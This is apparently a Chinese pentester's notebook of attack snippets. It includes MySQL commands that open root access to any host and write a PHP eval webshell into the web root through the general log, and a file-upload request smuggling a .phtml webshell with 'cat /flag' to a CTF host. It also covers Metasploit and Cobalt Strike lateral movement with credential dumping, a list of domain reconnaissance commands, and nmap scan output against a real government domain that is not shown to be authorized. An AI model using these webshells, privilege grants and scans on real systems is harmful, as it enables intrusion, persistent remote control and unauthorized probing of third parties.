允许root任何地址连接

SELECT user, host FROM mysql.user;

+------+-----------+
| user | host |
+------+-----------+
| root | 127.0.0.1 |
| root | ::1 |
| root | localhost |
+------+-----------+

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;

#MySQL

注意，由于日志文件内容太多，导致木马无法执行，这里清空日志，然后重新设置一个日志路径：

TRUNCATE TABLE mysql.general_log;
SET GLOBAL general_log_file = 'C:/phpStudy/WWW/mysql1.log';
SELECT '<?php @eval($_POST[cmd]) ?>';

使用蚁剑连接
#日志

2. 开启日志功能，并设置日志文件的路径

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = 'C:/phpStudy/WWW/mysql.log';
SELECT CONCAT('general_log: ', (SELECT VARIABLE_VALUE FROM information_schema.GLOBAL_VARIABLES WHERE VARIABLE_NAME = 'general_log'),
', general_log_file: ', (SELECT VARIABLE_VALUE FROM information_schema.GLOBAL_VARIABLES WHERE VARIABLE_NAME = 'general_log_file')) AS log_settings;

#日志

1. 打印当前日志功能情况

SELECT
CONCAT(
'general_log: ', (SELECT VARIABLE_VALUE FROM information_schema.GLOBAL_VARIABLES WHERE VARIABLE_NAME = 'general_log'),
', log_output: ', (SELECT VARIABLE_VALUE FROM information_schema.GLOBAL_VARIABLES WHERE VARIABLE_NAME = 'log_output'),
', general_log_file: ', (SELECT VARIABLE_VALUE FROM information_schema.GLOBAL_VARIABLES WHERE VARIABLE_NAME = 'general_log_file')
) AS log_settings;

#日志

利用mysql日志功能写入php木马

1. 打印当前日志功能情况

SELECT
CONCAT(
'general_log: ', (SELECT VARIABLE_VALUE FROM information_schema.GLOBAL_VARIABLES WHERE VARIABLE_NAME = 'general_log'),
', log_output: ', (SELECT VARIABLE_VALUE FROM information_schema.GLOBAL_VARIABLES WHERE VARIABLE_NAME = 'log_output'),
', general_log_file: ', (SELECT VARIABLE_VALUE FROM information_schema.GLOBAL_VARIABLES WHERE VARIABLE_NAME = 'general_log_file')
) AS log_settings;

POST /upload_file.php HTTP/1.1
Host: b3eddb78-facf-4f3e-a887-e945bc4acc99.node5.buuoj.cn:81
Content-Length: 395
Cache-Control: max-age=0
Origin: http://b3eddb78-facf-4f3e-a887-e945bc4acc99.node5.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTyZ7dzXYeDEQzKSB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://b3eddb78-facf-4f3e-a887-e945bc4acc99.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,ja;q=0.6
Connection: keep-alive

------WebKitFormBoundaryTyZ7dzXYeDEQzKSB
Content-Disposition: form-data; name="file"; filename="1.phtml"
Content-Type: image/jpeg

GIF89a
<script language='php'>@eval($_POST['cmd']);</script>
<script language='php'>system('cat /flag');</script>
------WebKitFormBoundaryTyZ7dzXYeDEQzKSB
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundaryTyZ7dzXYeDEQzKSB--

文件包含之pearcmd.php的妙用

http://www.sqlone.top/article/av38

#pearcmd.php #FLI #RCE #php

phpStudyBackDoor

phpStudy是国内的一款免费PHP调试环境的程序集成包，是初学者搭建PHP环境时不错的选择，同时使用phpStudy也方便运维人员部署LAMP、LNMP环境。phpStudy在国内有着近百万PHP语言学习者、开发者用户。
但正是这样一款公益性软件，在2018年被爆出存在后门文件，攻击者可以远程控制执行危险命令。经调查，该后门文件是由马某等犯罪嫌疑人使用黑客手段非法侵入phpStudy软件官网，篡改软件安装包内容所致。该“后门”当时无法被杀毒软件扫描删除，并且藏匿于PHP的php_xmlrpc.dll模块中，极难被发现。经过分析，该后门除了有反向连接木马的功能之外，还可以正向执行任意PHP代码。
该后门影响版本为phpStudy 2016和phpStudy 2018的php-5.2.17、php-5.4.45。

fscan

一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。

https://github.com/shadow1ng/fscan

#内网 #扫描

GitHub

GitHub - shadow1ng/fscan: 一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。(An intranet comprehensive scanning tool, enabling one-click automated, all…

一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。(An intranet comprehensive scanning tool, enabling one-click automated, all-round vulnerability scanning) - shadow1ng/fscan

PHPSerialize-labs

PHPSerialize-labs是一个使用php语言编写的，用于学习CTF中PHP反序列化的入门靶场。旨在帮助大家对PHP的序列化和反序列化有一个全面的了解。

https://github.com/ProbiusOfficial/PHPSerialize-labs

#靶场

GitHub

GitHub - ProbiusOfficial/PHPSerialize-labs: 【Hello-CTF labs】PHPSerialize-labs是一个使用php语言编写的，用于学习CTF中PHP反序列化的入门靶场。旨在帮助大家对PHP的序列化和反序列化有一个全面的了解。

【Hello-CTF labs】PHPSerialize-labs是一个使用php语言编写的，用于学习CTF中PHP反序列化的入门靶场。旨在帮助大家对PHP的序列化和反序列化有一个全面的了解。 - ProbiusOfficial/PHPSerialize-labs

ISW靶场简介
ISW靶场（Internet Security Wargame）是一个专注于网络安全的在线靶场，提供模拟真实网络攻击和防御的环境。该平台允许用户通过实际操作来提升网络安全技能，包括渗透测试、漏洞分析和防御策略的实施。

ISW靶场的特点包括：

多样化的靶机：提供不同类型和难度的靶机，适合各个水平的安全从业者。
真实场景模拟：通过模拟真实网络环境，用户可以学习如何识别和利用安全漏洞。
社区支持：有活跃的用户社区，提供交流与学习的机会。
该靶场对提高安全技能、测试工具的有效性和学习最新攻击技术非常有帮助。

#ISW靶场 #网络安全 #渗透测试

chatgpt提示词

遵循以下：
- 请你始终使用中文回复。
- 在回答的开头，添加一个关于回答内容的概括性标题
- 在回答的末尾，换行后添加若干关于回答内容的关键词，关键词添加”#“前缀

#提示词

Metasploit 和 Cobalt Strike 联动实现方法

Metasploit 和 Cobalt Strike 都是流行的渗透测试工具，它们可以通过以下几种方式实现联动，以提高攻击的效率和效果：

利用 Cobalt Strike 生成的 Payload：

在 Cobalt Strike 中，可以生成 Metasploit 可识别的 payload（如 meterpreter），并将其用于 Metasploit 的 exploit 中。这使得在 Metasploit 中可以直接利用 Cobalt Strike 的功能。
共享会话：

一旦在 Cobalt Strike 中建立了会话，可以通过 sleep 或 reconnect 模块在 Metasploit 中控制该会话。这样可以在两个工具间快速切换，利用各自的优点。
使用 Cobalt Strike 的 Beacon：

将 Cobalt Strike 的 Beacon 用于 Metasploit 中，以便从 Metasploit 发送命令和执行模块。可以通过设置 Beacon 的回调地址，让 Metasploit 和 Cobalt Strike 共享信息。
整合脚本：

可以编写自定义脚本，将 Metasploit 和 Cobalt Strike 进行整合，实现自动化攻击流程。例如，通过 Metasploit 进行初步攻击，成功后再利用 Cobalt Strike 进行进一步的横移和数据获取。
通过 API 集成：

Cobalt Strike 提供了 REST API，可以通过编程的方式将 Cobalt Strike 和 Metasploit 进行集成，使用 Metasploit 进行漏洞利用后，使用 API 触发 Cobalt Strike 的相关功能。
在使用这两者进行联动时，需注意环境安全和合规性，确保所有操作在授权范围内进行。

#Metasploit #CobaltStrike #联动攻击

Metasploit 内网横移实现方法

Metasploit 是一个强大的渗透测试框架，可以通过多种方式实现内网横移。以下是常用的方法：

利用有效凭证：

使用 Metasploit 的 hashdump 模块获取 Windows 系统的哈希值，然后使用 psexec 模块或 smb_login 模块进行横移。
Pass-the-Hash：

通过 psexec 模块直接使用 NTLM 哈希进行认证，避免密码明文传输。
利用 SMB 和 WMI：

使用 windows/smb/psexec 模块通过 SMB 协议连接到目标主机，或使用 windows/wmi/exec 模块通过 WMI 执行命令。
RDP 连接：

如果有 RDP 访问权限，可以使用 RDP 模块直接连接到目标机器。配置好后，使用 rdp 模块进行远程桌面连接。
利用 PowerShell：

Metasploit 提供了多种 PowerShell 模块，可以通过 PowerShell Remoting 实现横移。例如，使用 powershell/shell 模块在远程系统上执行命令。
Kerberos 验证：

在 Active Directory 环境中，可以使用 Rubeus 等工具请求和转发 Kerberos 票据，实现横移。
在进行这些操作时，请确保遵循合法合规的渗透测试流程，并在授权范围内进行。

#Metasploit #内网横移 #渗透测试

Cobalt Strike 内网横移实现方法

Cobalt Strike 是一个广泛用于渗透测试和红队活动的工具，其内网横移功能可以通过以下几种方法实现：

凭证获取：使用 Cobalt Strike 的 Mimikatz 模块获取有效的凭证（例如，域凭证、NTLM 哈希等），并利用这些凭证进行身份验证。

Pass-the-Hash：如果获取到用户的 NTLM 哈希，可以使用 Pass-the-Hash 技术直接在目标机器上进行身份验证，而不需要明文密码。

RDP 和 SMB：利用 RDP 和 SMB 协议进行横移。可以使用 Cobalt Strike 提供的远程桌面和 SMB 功能连接到其他计算机。

利用 WMI 和 PowerShell：使用 WMI（Windows Management Instrumentation）或 PowerShell Remoting 来远程执行命令，达到横移的目的。

反向连接：通过反向连接的方式，利用已经控制的主机来连接其他目标主机。

利用 Kerberos：在 Active Directory 环境中，可以利用 Kerberos 票据进行身份验证，使用工具如 Rubeus 来请求和转发票据。

在进行内网横移时，应注意控制隐蔽性，并随时监控目标环境的响应，以降低被检测的风险。

#CobaltStrike #内网横移 #渗透测试

Windows 内网信息收集命令

| 分类 | 命令 | 用途 |
|--------------|--------------------------------------------|--------------------------------------|
| 网络和接口信息 | ipconfig /all | 显示所有网络接口的详细信息 |
| | ipconfig /displaydns | 显示本地的 DNS 缓存 |
| | netstat -r | 显示路由表 |
| | netstat -bnao | 列出所有活动的端口及连接状态 |
| | netsh firewall show config | 查看防火墙配置 |
| | netsh advfirewall firewall show rule name=all | 显示所有高级防火墙规则 |
| 用户和权限信息 | whoami /all | 列出当前用户的用户名、组名和权限 |
| | net user /domain | 列出域内所有用户 |
| | net accounts /domain | 显示域密码策略 |
| 共享和组信息 | net share | 显示当前的共享文件夹 |
| | net view /domain | 列出所有域名 |
| | net group /domain | 列出域里的组 |
| | net group "domain computers" /domain | 列出域内所有主机 |
| | net group "domain admins" /domain | 列出域管理员 |
| | net group "enterprise admins" /domain | 列出企业管理员组 |
| 系统和进程信息 | systeminfo | 查看系统版本、补丁等详细信息 |
| | wmic | 查看系统信息（如硬件、服务等） |
| | tasklist | 列出所有当前运行的进程 |

#Windows #内网信息收集 #命令分类

nmap -T4 112.51.0.152 -p 1-65535

#nmap

nmap -A -T4 fj.tobacco.gov.cn

基本信息：

IP 地址：112.51.0.152
主机状态：在线（响应时间：0.0056s）
开放端口：

80/tcp（HTTP）：
服务：Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
服务器：Microsoft-IIS/7.5
443/tcp（HTTPS）：
服务：Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
服务器：Microsoft-IIS/7.5
SSL 证书信息：
通用名：*.tobacco.gov.cn
组织名：国家烟草专卖局
有效期：从 2024-08-01 到 2025-08-01
HTTP 方法：

存在潜在风险的方法：TRACE。
操作系统信息：

识别到的操作系统是基于 Linux 的 Actiontec MI424WR-GEN3I 无线接入点，内核版本为 2.4.X。
网络拓扑：

网络距离：2 跳。
额外信息：

脚本检测结果显示时钟偏差为 1 秒。

#Nmap #网络安全 #信息收集